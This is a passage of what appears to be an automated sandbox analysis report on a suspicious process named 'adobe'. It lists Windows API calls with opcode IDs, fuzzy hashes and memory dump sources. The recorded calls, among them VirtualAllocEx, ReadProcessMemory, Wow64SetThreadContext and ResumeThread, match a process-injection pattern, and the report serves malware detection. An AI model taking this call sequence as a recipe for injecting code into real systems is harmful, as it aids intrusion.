                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F550D7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: 00b1e5d7a1d55073ea0a53aca171a54f61d04ce02350188b8b0009c9a1a89b4f
                                    • Instruction ID: fde345981fed7f89a5d9a4d7555475da2bd6fb812a8129bfa48a18443b22a335
                                    • Opcode Fuzzy Hash: 00b1e5d7a1d55073ea0a53aca171a54f61d04ce02350188b8b0009c9a1a89b4f
                                    • Instruction Fuzzy Hash: 4421B2B5D002499FDB10CF9AD884ADEFBF5FB48324F24842AE919A7310D775A944CFA4
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074663E0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 8f96aba374ee2d37db65977e3472c703cf58514456b439094cfdb8bd8847b4d7
                                    • Instruction ID: db2d1c2bc06e18c98be488616e40985d4bb53a230ae0115fc342735f19e525f2
                                    • Opcode Fuzzy Hash: 8f96aba374ee2d37db65977e3472c703cf58514456b439094cfdb8bd8847b4d7
                                    • Instruction Fuzzy Hash: A92136B1D003599FDB10DFAAC884AEEFBF5FF48320F50882AE559A7250CB349544CBA1
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466156
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 7248d5eb05858869c59336bd58490400ed0e532d5311238ff6a2f0a5d827c29d
                                    • Instruction ID: 14e0c626554ce7e182cd7af519f94f26a33910400eee6bc16efbfca6251f7a5b
                                    • Opcode Fuzzy Hash: 7248d5eb05858869c59336bd58490400ed0e532d5311238ff6a2f0a5d827c29d
                                    • Instruction Fuzzy Hash: 512139B1D002099FDB10DFAAC8857EEBBF4EF48364F10842AD459A7241CB789985CFA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050AD62E,?,?,?,?,?), ref: 050AD6EF
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 9d9ee491d21b90d531a4dfb1f59313138accaa9a8d90e3b3d105b96ad11f9e1e
                                    • Instruction ID: 814bef9fa3d85ad3188e8a8350b2048490c7f735d21c411155ec1e2312577542
                                    • Opcode Fuzzy Hash: 9d9ee491d21b90d531a4dfb1f59313138accaa9a8d90e3b3d105b96ad11f9e1e
                                    • Instruction Fuzzy Hash: 1321E5B6900248EFDB10CF99D584ADEBBF5FB48310F14841AE918A7350D378A954CFA4
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050AD62E,?,?,?,?,?), ref: 050AD6EF
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: b86681a524609974c619aa7624c3597d4e8060f972442646642e9ab3cca9b6ca
                                    • Instruction ID: aabbae90731f13236c0abe4f241d108ebfad6191c82e2b706e60933183ec4c3c
                                    • Opcode Fuzzy Hash: b86681a524609974c619aa7624c3597d4e8060f972442646642e9ab3cca9b6ca
                                    • Instruction Fuzzy Hash: 6221E3B6900258AFDB10CFAAD984ADEBBF5FB48310F14841AE918A7350D374A954CFA5
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074663E0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: b2ca0e4e375c9b71547e94ba1f3b073a6ee8bb3b2cd5414efd13f3ff50d93b4f
                                    • Instruction ID: 896dd1a96ac169ebcda375bac471998b266c83e405454bd539fe6f5dd3b2c4d4
                                    • Opcode Fuzzy Hash: b2ca0e4e375c9b71547e94ba1f3b073a6ee8bb3b2cd5414efd13f3ff50d93b4f
                                    • Instruction Fuzzy Hash: 7D2128B1C003599FCB10DFAAC984ADEFBF5FF48320F10882AE559A7250C7749544CBA5
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466156
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: b33644af822952645810a7434dc2c229dc9496122e3f872978b384d1945e7693
                                    • Instruction ID: 2e939a71a6d40b7ea7904b0fd46a52c85908f13b0c422746e11f8d2b408c3426
                                    • Opcode Fuzzy Hash: b33644af822952645810a7434dc2c229dc9496122e3f872978b384d1945e7693
                                    • Instruction Fuzzy Hash: FD2138B1D003099FDB10DFAAC4857EEBBF4EF48324F10842AD459A7241C7789945CFA5
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0746621E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: d2f0d3cfc2e7c753027b8d2369e51e584b4a11b0f39bdee9a9e36b6481073812
                                    • Instruction ID: e1ee65757e6c19a5a0ec0bcfcaaedc1367d7ca07037aa1ede5239ecac5984dca
                                    • Opcode Fuzzy Hash: d2f0d3cfc2e7c753027b8d2369e51e584b4a11b0f39bdee9a9e36b6481073812
                                    • Instruction Fuzzy Hash: 981147B19002499FCB10DFA9D844AEFBFF5EB48324F20881AE555A7260CB759540CFA2
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050AB481,00000800,00000000,00000000), ref: 050AB672
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 2183e3d26e72bd1a590dc7bae29e11a934645204a72cb023f9b179b0620e07b3
                                    • Instruction ID: d15065adbadb3298f3370c8eb77d2bf11ae2750bfb846800e5f41c91a28922f6
                                    • Opcode Fuzzy Hash: 2183e3d26e72bd1a590dc7bae29e11a934645204a72cb023f9b179b0620e07b3
                                    • Instruction Fuzzy Hash: 561126B6D04308DFCB10CF9AD448ADEFBF5EB88310F14842AE559A7210C379A545CFA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 6e6e60cafd7e8f6c6da8839ec323aa3b99f97ae140ef3662e3f1139d9131dde0
                                    • Instruction ID: 0de1ff31a0a148234b32f606cac84d73e941b8a64c11a44057a22078b0f005cb
                                    • Opcode Fuzzy Hash: 6e6e60cafd7e8f6c6da8839ec323aa3b99f97ae140ef3662e3f1139d9131dde0
                                    • Instruction Fuzzy Hash: F1118EB1D003488BCB20DFAAC4457DFFFF5EB88320F208829D455A7250C7355544CBA1
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0746621E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: a3095bcb4f86ce7bde25fa1ad9bf35b31af8b2b51816aa3fae11e7e11444a9a9
                                    • Instruction ID: 011c33718df969c9e39247fb7f251654747cf1fd904aee653a89f4aeedfd0be7
                                    • Opcode Fuzzy Hash: a3095bcb4f86ce7bde25fa1ad9bf35b31af8b2b51816aa3fae11e7e11444a9a9
                                    • Instruction Fuzzy Hash: DC1126B19002499FCB10DFAAC844BDFBFF5EB48324F20881AE555A7250C775A544CFA1
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050AB481,00000800,00000000,00000000), ref: 050AB672
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 227b7632ab69230a5867d884f148e310acba3e5c8aa8ec5b5f4468a250b5bf0f
                                    • Instruction ID: 0f5e30da4d188307b20364a84e5c62825906b053f579141042c1c5545ccc985c
                                    • Opcode Fuzzy Hash: 227b7632ab69230a5867d884f148e310acba3e5c8aa8ec5b5f4468a250b5bf0f
                                    • Instruction Fuzzy Hash: F01123B6D00208DFCB10CF9AD844ADEFBF4FB88310F14842AE559A7210C379A545CFA5
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05F5A978
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 2deb9f6b1fae434a700429c4d3b711a30ac9ff91f29a19f4e64f718fcfb7e6cf
                                    • Instruction ID: 072501b1a5177a9e07ef207e7949be2424722c4a89ad030bf3ed2d6bdbf6a6d0
                                    • Opcode Fuzzy Hash: 2deb9f6b1fae434a700429c4d3b711a30ac9ff91f29a19f4e64f718fcfb7e6cf
                                    • Instruction Fuzzy Hash: 461155B5800219CFCB10CF99C484BDEFBF5EB48320F11841AD958A7340D338A984CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,050AB1CC), ref: 050AB406
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 13e3d168afcd038d7134bbde9626f889e22ece41da5f6420313918c911965c4a
                                    • Instruction ID: 403d5fc5fcd88349f8cbef0f6c77ecddd2e88fba3d619889eac19e40319a5f09
                                    • Opcode Fuzzy Hash: 13e3d168afcd038d7134bbde9626f889e22ece41da5f6420313918c911965c4a
                                    • Instruction Fuzzy Hash: 321102B6C043498FCB20DF9AD844BDEFBF5EB48214F10842AD959B7210D379A545CFA5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: de44732cf59f2e9a381121043b86e32d48e570bc03f01bbfad7cd76a58dff7d8
                                    • Instruction ID: cc838be5da444a23780ccf41c2970364e19bda69659ed6d01500cc057883079d
                                    • Opcode Fuzzy Hash: de44732cf59f2e9a381121043b86e32d48e570bc03f01bbfad7cd76a58dff7d8
                                    • Instruction Fuzzy Hash: 4F1128B1D003498BCB10DFAAC4497DEFBF5EB88324F24882AD559A7250C775A944CBA5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 074689B5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: ebd46e0f4aec0eba5f06e7f76232e19ae62bd29aced250fce733e6c5e6b5a6f4
                                    • Instruction ID: 3b1b74639c6ccda34e04da1c82c3973f481671cc34477520f8ee90b4ce8c57c5
                                    • Opcode Fuzzy Hash: ebd46e0f4aec0eba5f06e7f76232e19ae62bd29aced250fce733e6c5e6b5a6f4
                                    • Instruction Fuzzy Hash: 421116B58003499FCB10DF99D844BDEFFF8EB49324F10855AD554A3650C375A544CFA2
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 074689B5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7460000_adobe.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 5dc890e34de10638588b15075d7031de84120602e75ebb620ff0436806c4b7cf
                                    • Instruction ID: 608672c958f67c6d14897231fc2206ab95237f72711a845fb81bba94a4f3b679
                                    • Opcode Fuzzy Hash: 5dc890e34de10638588b15075d7031de84120602e75ebb620ff0436806c4b7cf
                                    • Instruction Fuzzy Hash: F811F5B5800349DFCB10DF9AC548BDFBBF8EB59314F10885AE555A7200D375A944CFA2
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05F5A978
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 49d7022fa7f3e0b15b11300305007ec7b1d8eea392019bf8f05bfde869cc0cf5
                                    • Instruction ID: 88e06cc853e9939fc6880cf01a4bc975ca9accd6faba096f96f1556617848b04
                                    • Opcode Fuzzy Hash: 49d7022fa7f3e0b15b11300305007ec7b1d8eea392019bf8f05bfde869cc0cf5
                                    • Instruction Fuzzy Hash: BF1133B5800259CFCB10DF9AC544BDEFBF4EB48320F21842AD958A7250C338A584CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: b06cf1fcf104daf9dfee8023a769a1bccaa42c03699279da0b4fc2ae3553afb4
                                    • Instruction ID: f568cfe23e57b99b2d6043a13a6ee837ef95aee0cdc00b513b71739bb8be35ba
                                    • Opcode Fuzzy Hash: b06cf1fcf104daf9dfee8023a769a1bccaa42c03699279da0b4fc2ae3553afb4
                                    • Instruction Fuzzy Hash: 7241AD76B002458FCB15DBB9984897EBBF6FFC42207148529E469CB3A4EF349C058B91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8oq
                                    • API String ID: 0-3198120224
                                    • Opcode ID: abc842a7fb0f2aca329a82eb8fe3ed90ec94e40e2256b1dc3706ae205d621272
                                    • Instruction ID: 5343ad579b452f6711dac3ed5e683efcd6a34beab36c140571e729c5597c008d
                                    • Opcode Fuzzy Hash: abc842a7fb0f2aca329a82eb8fe3ed90ec94e40e2256b1dc3706ae205d621272
                                    • Instruction Fuzzy Hash: FC1136363283088FC309EA68E55055F77A7FBC9219B14806EE44AC7744DE3A8C06CB51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 9131aa48bc8dd29e4f9e8a2f7f5845035566118138c1754ae165408634995f09
                                    • Instruction ID: c47b5975c2eda3c203ebbca66963fbba3337ad829d8b7a6fe774d87954b01a86
                                    • Opcode Fuzzy Hash: 9131aa48bc8dd29e4f9e8a2f7f5845035566118138c1754ae165408634995f09
                                    • Instruction Fuzzy Hash: AE1148B2F0020A8BCB15EBB999005EEB6F6AB88310B204069C505E7254EB399E05CBE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 1ee92204974b6c974c32f93471b61c75f5612d998edfbdc5293af4499e69fd70
                                    • Instruction ID: 24a97966acce00f4e6b520840b205b9b98a7a9829d2f92803ce64fb481792349
                                    • Opcode Fuzzy Hash: 1ee92204974b6c974c32f93471b61c75f5612d998edfbdc5293af4499e69fd70
                                    • Instruction Fuzzy Hash: 0A016D793105008FCB04EB69D898A2AB7E7FFC8610720842DE60AC7365CE35EC05CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: e85b88fe14fe404a0c5fe9f39d0383d94d0040109d0939c7e8adc2840ed25147
                                    • Instruction ID: 87c86688abe03affc2ab515929d90ded6851b44fb4e424311c5b8548325b96b3
                                    • Opcode Fuzzy Hash: e85b88fe14fe404a0c5fe9f39d0383d94d0040109d0939c7e8adc2840ed25147
                                    • Instruction Fuzzy Hash: 3901817A3105008FCB44EB79D498A2AB7E7FFC8610724842DE20ACB369CE35EC09CB50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 98b4a7722f2edb6c8bdd3acad239d704f8bc0adbdecc0e82897a35caf2776d78
                                    • Instruction ID: aafb950f334684a8d169db809026cc9a57bc40203afe68553dafc43174628c0c
                                    • Opcode Fuzzy Hash: 98b4a7722f2edb6c8bdd3acad239d704f8bc0adbdecc0e82897a35caf2776d78
                                    • Instruction Fuzzy Hash: 7EA160743206098FC345AB78D5986AEBBA6FBCD344F00852DE51A8B358DF389946CB91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a5127313fd69e8ff5fb97cd87bd9edd5d67e86572c438b61499e774247831b6
                                    • Instruction ID: ee0658ea02a3e8563b466b4b78bc9d93521d43fbf2aae5ec4e6daacaa829a9e5
                                    • Opcode Fuzzy Hash: 2a5127313fd69e8ff5fb97cd87bd9edd5d67e86572c438b61499e774247831b6
                                    • Instruction Fuzzy Hash: 709170743206098FC345AF78D5986AEBBA6FBCD344F00852DE51A87358DF38AD46CB81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6fbf12cce94de8cb6d7ec952b4c9ed716d27fa4c6ba6141b07f2e13c95280465
                                    • Instruction ID: f27885b40bdc184dc1135bbd839ff8ddf9761bec9073a8b54d73dc2dcbdc61ee
                                    • Opcode Fuzzy Hash: 6fbf12cce94de8cb6d7ec952b4c9ed716d27fa4c6ba6141b07f2e13c95280465
                                    • Instruction Fuzzy Hash: 15516C76E10249CFCF14DFA8D988ADDBBB6FF88304F148569E405AB361DB74A844CB61
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff882a58013908036902fe0bf89c636a2e3ca2aa51776570284cbbb1963d734e
                                    • Instruction ID: 21d80e5318fd5cec4fc34a6c12d529e9d76e29bf4a2ae85102fe5ef839e0e60c
                                    • Opcode Fuzzy Hash: ff882a58013908036902fe0bf89c636a2e3ca2aa51776570284cbbb1963d734e
                                    • Instruction Fuzzy Hash: 32516B76E00249CFCF14DFA8D988ADDBBB6FF88304F148569E405AB364DB34A844CB61
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3d16992072d08e831f2b9dc4ed9e57370ecd61d2d81ada7db2ab66f75e2fc26
                                    • Instruction ID: 19974ebe19904fb48e0d2023106a52b34eba3885a2c474caa32759c8cb079239
                                    • Opcode Fuzzy Hash: b3d16992072d08e831f2b9dc4ed9e57370ecd61d2d81ada7db2ab66f75e2fc26
                                    • Instruction Fuzzy Hash: 4351DBB6D1A209DFCB01CFA9D4848FEBBB9BB4D280F105455E856B7305DB789811CB62
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3290345fe153ff46280a8fc20acde2cbc62b025846251313998ebf8a801fc570
                                    • Instruction ID: 02bbd48f743996a26a5908af89220b482c1769c0123c7c48808b2c403dc62e7e
                                    • Opcode Fuzzy Hash: 3290345fe153ff46280a8fc20acde2cbc62b025846251313998ebf8a801fc570
                                    • Instruction Fuzzy Hash: 6B51FDB6D1A109DFCB01CFA9D4848FEBBB9BB0D280F105455E856F7305DB789811CB61
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9d55048ccb930600bd96b19c4ea0362e26d62e4e8572a5cd647493d5e44811c
                                    • Instruction ID: 08fac3a03c1cdf20ce4b27abfc8e3d48c8f2a3a819ea3d951e59e8d837e44707
                                    • Opcode Fuzzy Hash: e9d55048ccb930600bd96b19c4ea0362e26d62e4e8572a5cd647493d5e44811c
                                    • Instruction Fuzzy Hash: 8141C3B6D49318CFCF10CFA9D684AEDBBFABB4A301F146125E40AB7251DB789941CB01
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ea96f2dfb25088653d19f2cd8a29cb3234e4eaebd6812e2a245e3d8d8fdeee3
                                    • Instruction ID: 37f37eb5c049df8da0dd7c3ee66ea9e6a11cc010a1485d350cf6f7e88e0102da
                                    • Opcode Fuzzy Hash: 7ea96f2dfb25088653d19f2cd8a29cb3234e4eaebd6812e2a245e3d8d8fdeee3
                                    • Instruction Fuzzy Hash: B5415DB6A18218CFD704CF5AD5849BABBFAFF8E340B419495D019AB326DB789D14CB01
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: feecaa4b57d3064614c83a857bb1b7e1de6d301dc391031247a3240e2495166a
                                    • Instruction ID: abcaaa57d48cc19185d654c9bbf84a05dafb221987c4946d935e41e62a0c4129
                                    • Opcode Fuzzy Hash: feecaa4b57d3064614c83a857bb1b7e1de6d301dc391031247a3240e2495166a
                                    • Instruction Fuzzy Hash: 3B412BB2E18519CFD704CF5AD5889BABBFEBF8D340B419495D019AB326DB789C14CB01
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a21264da0dc77f17cccc18df2676b2b674bb61596bb5dde7f3b53983591e2939
                                    • Instruction ID: 4b4e6e8a11a633551ac38d9bab3df07c48c4fe2aba143e1fe33ce874bfa653b4
                                    • Opcode Fuzzy Hash: a21264da0dc77f17cccc18df2676b2b674bb61596bb5dde7f3b53983591e2939
                                    • Instruction Fuzzy Hash: 3041D835E002099FDB14DFA4D59C7EDBBB6FF88300F144429E402AB294EF749946CB85
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e641e53eff1ec81da2b5f7336cd5c8e352e5f59b3c1f7235c684117093905fff
                                    • Instruction ID: 7e0c7dfabbe29e2a0b83f66901af75b57addadc494841c67ea7162200a7c2ccf
                                    • Opcode Fuzzy Hash: e641e53eff1ec81da2b5f7336cd5c8e352e5f59b3c1f7235c684117093905fff
